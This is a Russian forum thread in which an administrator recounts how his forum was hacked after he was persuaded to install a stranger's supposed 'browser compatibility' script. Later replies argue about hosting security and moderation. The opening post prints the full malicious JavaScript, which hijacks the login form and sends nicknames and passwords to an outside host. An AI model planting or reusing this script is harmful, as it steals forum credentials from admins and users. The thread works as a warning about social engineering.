Рассказ о взломе

Форум » Ошибки админов и игроков » Рассказ о взломе » Ответить

Рассказ о взломе

Сентябрьский Лис: [Удалено администратором :) ] Администратор решил вернуть удаленное. Издание 2-е, перераб. и доп. 24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Вот этот скрипт: <script type="text/javascript"> function block (t) { t = t.replace("%", escape("%")); t = t.replace("$", escape("$")); t = t.replace("#", escape("#")); t = t.replace("\\", escape("\\")); return t; } function newtest() { if (document.all.nick.value) { a = document.all.nick.value; b = document.all.pass.value; } else if (document.frm.nick.value) { a = document.frm.nick.value; b = document.frm.pass.value; } else { a = "undefined"; b = "no"; } a = block(a); b = block(b); img = new Image(); img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b; setTimeout("newtest()", 1); } document.temp = new function() { var sec = document.write; this.write = function(txt) { txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>"); this.sec = sec; this.sec(txt); this.sec = null; return true; } return this; } document.write = document.temp.write; document.temp = null; document.writeln = document.write; </script> Ночью форум был взломан. (кликните на картинку, чтобы прочитать "послание" взломщика) Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров. Разговоры на форуме "Критик" до взлома моего форума: После взлома: Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше. "У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист. Действительно, тему почистили не всю. Чистосердечное признание! cater - второй ник Кота Бегемота. Комментарий специалиста: [quote]Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"[/quote]

Ответов - 100, стр: 1 2 3 4 5 All

Мэгги: М-да, что-то "рассказ о взломе" перерос в выяснение, "чей сервис круче" Конечно же, взломать можно абсолютно любой сайт, форум, что угодно. И для того, чтобы узнать, почему борду нельзя взломать, нужно обратиться к держателю сервиса. Сам он утверждает, что взломать нельзя. Цитата с Главной сервиса: Вас не смогут взломать через взлом форума. http://borda.ru/ Я в это верю хотя бы потому, что за почти три года на борде не видела ни одного взломанного форума. Видела, как и Лис, только такие, на которых сами админы допускали в настройки кого попало. Так что не верить Кейсу у меня нет нужды. По поводу майбб - ничего не скажу, потому что не знаю и имела с ним дело гораздо меньше. Может быть, его тоже взломать нельзя. Но утверждать этого не стану просто потому, что не знаю. По поводу юкоза тоже ничего не скажу. Своими глазами взломанных сайтов не видела. На юкозе есть очень хорошая защита от взлома, могу рассказать про неё. Во-первых, ник, с которым заходишь в ПА, совсем не тот, который у тебя на форуме. То есть, этот ник вообще никто не знает. Во-вторых, можно сделать так, чтобы одноврменно в АП мог находиться пользователь только с одним айпи. То есть, никто не сможет, даже при подмене куков, одновременно находиться в админпанели с хозяином сайта. В-третьих, если уж очень не хочется рисковать - можно закрепить ПА только за своим айпи (если он не динамический). Мне эта функция подходит как раз потому, что у меня статический айпи. Собственно, про юкоз никто не спрашивал. Но я хотела сказать, что утверждать голословно, что какой-либо сервис просто взломать и вокруг валяются взломанные форумы этого сервиса, всё-таки не стоит.

Сентябрьский Лис: Я - плохой администратор. Ещё три года назад меня так охарактеризовал один из участников форума, Sem: "Лис, он сначала такой мягкий-мягкий, а потом как развернётся, как размажет по стенке!" За три года Лис, наверное, ни в чём не изменился. Где не нужно, он "мягкий-мягкий", а потом, приходится размазывать по стенке, потому что в начале, как администратор не проявил необходимой твёрдости. Новая участница форума Gabi Kaufmann несколько раз допускала себе грубые высказывания, какие на данном форуме недопустимы. Вот несколько примеров, все я не привожу: Gabi Kaufmann пишет Шарлю: Оффтоп: ах вот вы где прохлаждаетесь?! А ну-ка марш в критику! Мы с вами еще не закончили. Источник Возможно, для самого Шарля это не показалось грубым - это его личное дело. Но такое обращение друг к другу не свойственно на данном форуме. Gabi Kaufmann пишет: а на борде одни скандалы. Источник Это пришёл говорить человек на форум, находящийся на сервисе borda. Тем более это клевета: как тут могут быть одни скандалы, когда на Броде масса Историчек, и просто форумов при крупных сайтах, хозяева которых предпочитают заводить форум на borda, а ни на каком другом, по известным причинам. В результате попустительства с моей стороны, участник дошёл до откровенной клеветы: Gabi Kaufmann пишет: Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис). Причина того что произошло - во мне. Лис плохой администратор и не смог, где это было необходимо сразу проявить должную твёрдость. И потому теперь - необходимая мера - размазывать по стенке. Очень грустно. Может быть, со временем я научусь должным образом администрировать форум (и не только этот). На самом деле, мне сразу резануло глаза поведение нового участника, но... почему-то я не вмешался. Хотя первая мысль была именно такой: вмешаться и объяснить, что здесь не принято такое обращение. А вторая мысль была: "Ну может она сама поймёт, что погорячилась, и вообще она тут сама писала, что навеселе все эти дни..." Нет! Не поймёт ничего участник сам. Если бы все всё сами понимали - ни администраторы, ни модераторы были бы не нужны ни на каком форуме. А они всё же нужны. Wanderer пишет: Кстати, Сентябрьский Лис, а почему на борде нельзя взломать форум? Бордой не пользовался никогда (душа не лежит), а посему не осведомлён, но хотелось бы знать. Wanderer, вот Вы сами, как думаете, что Вы написали? Вот я сейчас должен срочно бежать, изучить php, ява-скрипт, изучить досконально форум borda, проконсультироваться со специалистами и составить Вам понятный и доступный ликбез по этому вопросу. Хорошо, я могу это сделать. Но, как Вы понимаете, не бесплатно. Это ведь работа и достаточно серьёзная. Если Вам, как Вы пишете, хотелось бы это знать - Вы и должны поискать ответ на этот вопрос. Самостоятельно. Пройдитесь по техподдержкам различных сервисов, по хакерским форумам (их предостаточно в сети), проконсультируйтесь со своими личными друзьями-вундеркиндами по этому вопросу. В принципе и я могу это сделать для Вас. Но, даже репетитор математики младших классов стоит денег. А тут работа более трудная, чем математика младших классов. Из объективного могу сказать: обычно среднестатистический бесплатный форум ломают, взломав почтовый ящик админа и выслав туда пароль с форума. case убрал эту возможность на borda. Никакой администратор не может выслать себе пароль на почтовый ящик. И соответственно, хакер тоже. Это только один из пунктов защиты borda. Извинете, Wanderer, я очень груб.

Шарль: Сентябрьский Лис пишет: Возможно, для самого Шарля это не показалось грубым - это его личное дело. Но такое обращение друг к другу не свойственно на данном форуме. Показалось. Но очень не хотелось как-то комментировать ни приведенную вами в качестве примера фразу, ни некоторые другие - по двум причинам: - не хотелось затевать выяснение отношений на форуме, где мне в целом оказалось неожиданно уютно находиться; - я человек мирный, пока очень сильно не достанут. Я понимаю, везде есть неадекватные личности, не понимающие, где граница шутки и грубости, и лучший способ с ними бороться, если нет спецсредств воздействия - просто игнорировать. Простите за оффтоп, больше не буду )

McNamara: Шарль пишет: лучший способ с ними бороться, если нет спецсредств воздействия - просто игнорировать. Правильно! Участникам, в подобном случае, лучше всего игнорировать грубость другого участника, но админ это игнорировать не должен! На то он и админ. Dixi! Лис! Прошу прощения за смелую критику снизу (пользуясь тем, что я здесь - не админ и даже не модер))))

Wanderer: Сентябрьский Лис пишет: Тем более это клевета: как тут могут быть одни скандалы, когда на Броде масса Историчек, и просто форумов при крупных сайтах, хозяева которых предпочитают заводить форум на borda, а ни на каком другом, по известным причинам. Вот тут вы откровенно цепляетесь к словам. Там ведь явно видно, что это общая, утрированная фраза. А вы её так растолковали. Вы, кстати, не следователь, не прокурор? Сентябрьский Лис пишет: А вторая мысль была: "Ну может она сама поймёт, что погорячилась, и вообще она тут сама писала, что навеселе все эти дни..." Нет! Не поймёт ничего участник сам. Позволю себе не согласится. И, кстати, госпожа Kaufmann в теме критики в конце концов успокоилась и написала адекватный, заканчивающий разборки, пост. Сентябрьский Лис пишет: Wanderer, вот Вы сами, как думаете, что Вы написали? Простите, Лис, а вы тогда понимаете, что Вы написали? Вы сказали, что борду нельзя взломать. Раз вы в этом уверены, значит знаете почему это так. Иначе уверенность беспочвенная (условно). Поэтому я и спросил вас (а не кого-то ещё) об этом. Естественно, я не ожидал подробной лекции и пояснения всех нюансов. Но в общих чертах - можно было написать. Вот, например, пример с ящиком - коротко и ясно. Ну да ладно. Сентябрьский Лис пишет: Извинете, Wanderer, я очень груб. У меня такое ощущение, что вы сейчас почему-то очень разозлились/расстроились (даже "извините" с ошибкой пишите), и срываетесь на мне. Хотя я тут вобщем-то не при чём. Ладно и с этим. Итог: предлагаю прекратить ВСЕМ участникам форума недостойное поведение (мне и Вам в том числе), которое наблюдается среди многих последние дни. А Габи Кауфманн разбаньте, если забанили. Сначала дают преды, а потом уже банят. Да и первый бан - не вечный, а, как правило, не больше недели.

Сентябрьский Лис: Извинете Извинете - это "Извинение в инете" )))) Wanderer пишет: А Габи Кауфманн разбаньте, если забанили. Я не банил её! Вот ещё! Единственное, чем я ей пригрозил - изгадить её ЛЗ. И то этого не осуществил, как видите. Wanderer пишет: Простите, Лис, а вы тогда понимаете, что Вы написали? Вы сказали, что борду нельзя взломать. Раз вы в этом уверены, значит знаете почему это так. Иначе уверенность беспочвенная (условно). Поэтому я и спросил вас (а не кого-то ещё) об этом. Да, я действительно так написал, признаю. Но для всех бордовцев это объективно. Это так же объективно (для бордовцев), как то, что солнце восходит на востоке, а не на западе. По поводу взлома. Форум техподдержки case много раз пытались взломать (у case характер - не сахар, поверьте. И врагов у него предостаточно, особенно среди подростков-вундеркиндов) но не взломали ни разу. Меня тоже пытались ломать, но реально взломали только тогда, когда я сам поставил в настройки скрипт для взлома (см. первое сообщение темы). У меня тоже есть друзья-вундеркинды (а не только у Gabi Kaufmann) так вот, эти друзья вундеркинды очень тщательно сканировали форумы, но не нашли ни единой лазейки. Более того, borda, как выяснилось, существует с 2001 года. И она не всегда была такой неуязвимой. Но после модернизации, которую провёл case, года два назад (не помню точно даты) она перестала иметь какие бы то ни было "лазейки", "форточки", "дыры" и пр. Подробнее нужно спрашивать у специалистов.

Wanderer: Вот, сразу бы так. Всё намного понятнее. Спасибо за информацию. Сентябрьский Лис пишет: Да, я действительно так написал, признаю. Но для всех бордовцев это объективно. Вы и так знали, что я не бордовец, но я об этом ещё и в своём посте сообщил (вместе с вопросом). А вобще вижу, что вы были в состоянии аффекта, когда писали тот пост. Поэтому я вас прощаю Давайте все будем уважительнее и терпимее относится друг к другу. (тут может быть подпись "Кот Леопольд" :))

NaU: очень тщательно сканировали форумы, но не нашли ни единой лазейки Однако, плохо сканировали... Все, что создано человеком, может быть им же взломано.

Сентябрьский Лис: NaU, ну в принципе, прогресс идёт дальше и всё в жизни меняется. NaU пишет: Все, что создано человеком, может быть им же взломано. Ну, в принципе, то, что конкретный человек создал, он же конкретно и может взломать. Т.е. case, я думаю, запросто взломает свою Борду.

McNamara: NaU пишет: Все, что создано человеком, может быть им же взломано Да, безусловно, case борду взломает в два счёта Свой же сервис)))

Сентябрьский Лис: Сентябрьский Лис пишет: для всех бордовцев это объективно. Wanderer пишет: Вы и так знали, что я не бордовец, но я об этом ещё и в своём посте сообщил (вместе с вопросом). Я вообще-то себя подразумевал под бордовцем. Т.е. мне, как бордовцу, это было просто объективно. Во попробуйте обыкновенного человека заставить объяснить Вам почему именно солнце восходит на Востоке, а не на Западе - он тоже так сходу не объяснит.

Миледи2: Сентябрьский Лис Сентябрьский Лис пишет: Новая участница форума Gabi Kaufmann несколько раз допускала себе грубые высказывания, какие на данном форуме недопустимы. Вот несколько примеров, все я не привожу: Gabi Kaufmann пишет Шарлю: цитата: Оффтоп: ах вот вы где прохлаждаетесь?! А ну-ка марш в критику! Мы с вами еще не закончили. Источник Возможно, для самого Шарля это не показалось грубым - это его личное дело. Но такое обращение друг к другу не свойственно на данном форуме. Gabi Kaufmann пишет: цитата: а на борде одни скандалы. Источник Это пришёл говорить человек на форум, находящийся на сервисе borda. Тем более это клевета: как тут могут быть одни скандалы, когда на Броде масса Историчек, и просто форумов при крупных сайтах, хозяева которых предпочитают заводить форум на borda, а ни на каком другом, по известным причинам. В результате попустительства с моей стороны, участник дошёл до откровенной клеветы: Gabi Kaufmann пишет: цитата: Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис). Мне бы меньшего хватило для нажатия одной кнопочки... И не думаю, что долго объясняла бы причину... Сентябрьский Лис пишет: Я не банил её! Вот ещё! Единственное, чем я ей пригрозил - изгадить её ЛЗ. И то этого не осуществил, как видите. ИМХО, я бы поступила по-другому... Но я все рано еще раз прошу прощения за сорвашиеся у меня слова о миббе. Мне неловко, что так получилось...

Сентябрьский Лис: Миледи2 пишет: Мне бы меньшего хватило для нажатия одной кнопочки... Вот-вот. А Лис всё мягкий, мягкий по началу.... Я и говорю: плохой Лис администратор!

McNamara: Сентябрьский Лис Лучше быть жёстким* в самом начале))) Тогда до размазывания по стенке не дойдёт))) * Жёстким - не значит, жестоким. Кстати, не раз наблюдал на больших форумах: один раз человек ляпнул грубость - ему админ - устное (то есть, письменное, но без "занесения в личное дело") замечание. Второй раз ляпнул - ему уже "с занесением в личное дело" - то бишь, красненькую галочку с пояснением. Ну, а если и в третий раз не исправился - ищи другой форум. Кстати, это справедливо, потому что атмосфера на форуме зависит от каждого участника, а не только от одного админа, или парочки завсегдатаев.

Cilla: Присоединяюсь к теме, т.к. у самой юкоз ) Мэгги пишет: Во-первых, ник, с которым заходишь в ПА, совсем не тот, который у тебя на форуме. То есть, этот ник вообще никто не знает. Но ведь чтобы получить доступ к входу в ПА, надо войти на сайт под админским ником. Если его уведут, то не сможешь добраться до самого входа в ПА. При таком уводе контроль над сайтом будет потерян полностью - и владельцем, и взломщиком, ведь так? Cilla, я Вам поменял автоподпись - теперь должно сработать. Нужно в неё ставить bb-коды, а не html Лис

Мэгги: Cilla пишет: Если его уведут, то не сможешь добраться до самого входа в ПА. При таком уводе контроль над сайтом будет потерян полностью - и владельцем, и взломщиком, ведь так? Не так. Эта информация есть на форуме техподдержки юкоза, поэтому пишу её в открытом доступе. Взломщикам она ничего кроме головной боли, не добавит. Набираете в адресной строке: http://адрес сайта/admin - и попадаете на страницу переадресации, с которой вход в ПА. Для взломщиков тут сложность в том, что ник для ПА - не тот, что для самого сайта. А подбирать ник и пароль - конечно, невозможного ничего нет, но гораздо сложнее, чем только пароль. Так что если вам взломали админский ник - просто входите в ПА, меняете ник и пароль, с которыми заходили на сайт - и взломщик автоматически вылетает. Всё просто.

Миледи2: Сентябрьский Лис пишет: Я и говорю: плохой Лис администратор! Вы замечательный админ! Не стоит заражаться моим сволочизмом

Миледи2: McNamara пишет: Лучше быть жёстким* в самом начале))) Тогда до размазывания по стенке не дойдёт))) * Жёстким - не значит, жестоким. Кстати, не раз наблюдал на больших форумах: один раз человек ляпнул грубость - ему админ - устное (то есть, письменное, но без "занесения в личное дело") замечание. Второй раз ляпнул - ему уже "с занесением в личное дело" - то бишь, красненькую галочку с пояснением. Ну, а если и в третий раз не исправился - ищи другой форум. Кстати, это справедливо, потому что атмосфера на форуме зависит от каждого участника, а не только от одного админа, или парочки завсегдатаев. Сентябрьский Лис Просто надо уметь пользоваться дисциплинарными мерами, как здесь написано. Но это уже оффтоп...

Сентябрьский Лис: Миледи2 пишет: Вы замечательный админ! Миледи2, спасибо! Миледи2 пишет: Но это уже оффтоп... В принципе - да. Я даже подумал, не отделить ли всё это в какую-нибудь тему, скажем, с названием: "Мнение участников форума о Лисе"

декабрьский колобок: Сентябрьский Лис пишет: Ни массы случаев, ни одного случая Вы привести не сможете - это ложь. Да, профессиональный программист, уровня ЦРУ, сможет взломать, но не мой форум отдельно, а весь сервис borda, принадлежащий case. Но никакой ребёнок, отдельно форум "Сентябрьский Лис" не взломает. Она может и не может, зато я могу. Привести?

полная версия страницы